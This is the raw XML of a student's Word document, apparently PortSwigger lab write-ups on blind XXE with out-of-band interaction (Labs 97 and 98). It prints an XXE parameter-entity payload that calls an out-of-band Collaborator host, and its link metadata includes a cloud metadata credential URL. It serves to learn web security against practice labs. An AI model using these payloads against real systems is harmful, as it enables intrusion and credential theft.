          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ca</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C08">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e33cf11c1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087A4E3" w14:textId="4F526EFF" w:rsidR="003D0C08" w:rsidRDefault="003D0C08" w:rsidP="000D6586">
      <w:r w:rsidRPr="003D0C08">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28791F82" wp14:editId="06525003">
            <wp:extent cx="3130062" cy="340109"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1331447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7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3500" cy="3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4D2" w14:textId="77777777" w:rsidR="005C2ADA" w:rsidRDefault="005C2ADA" w:rsidP="000D6586"/>
    <w:p w14:paraId="42AB0C7D" w14:textId="0B383723" w:rsidR="005C2ADA" w:rsidRDefault="005C2ADA" w:rsidP="007004B9">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007004B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB 97 </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="007004B9" w:rsidRPr="007004B9">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:b/>
            <w:bCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Blind XXE with out-of-band interaction</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60E45C23" w14:textId="4659BD6B" w:rsidR="007004B9" w:rsidRDefault="00270CE6" w:rsidP="007004B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="003D5C4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lab contains an XML structure, however, it does not return any content explicitly in responses. Though, it still may be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D5C4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnerable to Blind XXE. Let’s check it by using old technique and try to complete a DNS lookup to Burp Collaborator server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5513B00B" w14:textId="1C9A375C" w:rsidR="00270CE6" w:rsidRDefault="00270CE6" w:rsidP="007004B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00270CE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="027EC23A" wp14:editId="5B83F73E">
            <wp:extent cx="4889358" cy="2016370"/>
            <wp:effectExtent l="0" t="0" r="6985" b="3175"/>
            <wp:docPr id="652220561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20561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758" cy="20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AEA84B9" w14:textId="1A1A13D2" w:rsidR="00270CE6" w:rsidRDefault="003D5C4B" w:rsidP="007004B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The DNS lookup detected the connection. Attack done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2352C528" w14:textId="680B86F1" w:rsidR="00270CE6" w:rsidRDefault="00270CE6" w:rsidP="007004B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00270CE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D44AEC2" wp14:editId="3FB6D72E">
            <wp:extent cx="4220308" cy="1594288"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="43523896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896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1990" cy="15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67C5" w14:textId="77777777" w:rsidR="003D5C4B" w:rsidRDefault="003D5C4B" w:rsidP="007004B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75AA28C4" w14:textId="3D882E9B" w:rsidR="003D5C4B" w:rsidRDefault="003D5C4B" w:rsidP="007004B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5C4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C70CCD9" wp14:editId="007D367B">
            <wp:extent cx="4179277" cy="367669"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50214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05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0353" cy="3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3B98" w14:textId="77777777" w:rsidR="003D5C4B" w:rsidRDefault="003D5C4B" w:rsidP="003D5C4B">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5C4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LAB 98 </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="003D5C4B">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:b/>
            <w:bCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Blind XXE with out-of-band interaction via XML parameter entities</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D8B3E48" w14:textId="40027572" w:rsidR="003D5C4B" w:rsidRDefault="00A46BE1" w:rsidP="003D5C4B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this lab, everything remains the same, but this time the standard XML parameter is used :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C2A1B0" w14:textId="5BAB0560" w:rsidR="00A46BE1" w:rsidRDefault="00A46BE1" w:rsidP="003D5C4B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE stockCheck [&lt;!ENTITY % xxe SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A46BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"http://9isluc9yffme929metw2s30n7ed511pq.oastify.com"&gt;%xxe; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC6BF48" w14:textId="6E8205E9" w:rsidR="00A46BE1" w:rsidRPr="00A46BE1" w:rsidRDefault="00A46BE1" w:rsidP="003D5C4B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This payload will declare a new XML entity “xxe” and uses it within the DTD. As before, it should cause a DNS lookup on my Burp Collaborator server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC15F6" w14:textId="1C01DA5A" w:rsidR="003D5C4B" w:rsidRDefault="00A46BE1" w:rsidP="003D5C4B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E227BA6" wp14:editId="49043214">
            <wp:extent cx="5940425" cy="2911475"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="39088267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8267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F9FD" w14:textId="164FFBA7" w:rsidR="00A46BE1" w:rsidRDefault="00A46BE1" w:rsidP="003D5C4B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DNS lookup received, lab’s done!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C34BDB4" w14:textId="2A757A35" w:rsidR="00A46BE1" w:rsidRPr="00A46BE1" w:rsidRDefault="00A46BE1" w:rsidP="003D5C4B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77DE075C" wp14:editId="472ABE48">
            <wp:extent cx="5940425" cy="2468245"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8255"/>
            <wp:docPr id="16039881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881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25A6" w14:textId="53E60D6F" w:rsidR="003D5C4B" w:rsidRPr="007004B9" w:rsidRDefault="003D5C4B" w:rsidP="007004B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003D5C4B" w:rsidRPr="0070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6D"/>
    <w:rsid w:val="000D6586"/>
    <w:rsid w:val="00270CE6"/>
    <w:rsid w:val="002F6C1A"/>
    <w:rsid w:val="003C1BB0"/>
    <w:rsid w:val="003D0C08"/>
    <w:rsid w:val="003D5C4B"/>
    <w:rsid w:val="005C2ADA"/>
    <w:rsid w:val="007004B9"/>
    <w:rsid w:val="007271DF"/>
    <w:rsid w:val="00A46BE1"/>
    <w:rsid w:val="00BD01CE"/>
    <w:rsid w:val="00E70838"/>
    <w:rsid w:val="00EF55D5"/>
    <w:rsid w:val="00F01CE2"/>
    <w:rsid w:val="00F441F3"/>
    <w:rsid w:val="00F7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9C68"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D2E662C5-12BD-4025-B004-91ADF03A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1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D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D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1D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1D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1D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1D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1D6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1D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55D5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EF5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506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iam-roles-for-amazon-ec2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portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssr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portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entiti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ortswigger.net/web-security/xxe/lab-xinclude-attack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portswigger.net/web-security/xxe/lab-xxe-via-file-upload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portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://169.254.169.254/latest/meta-data/iam/security-credentials/admi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Anatoliy (STUD)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Do Anatoliy (STUD)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2024-03-21T04:20:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-20T22:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-21T22:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>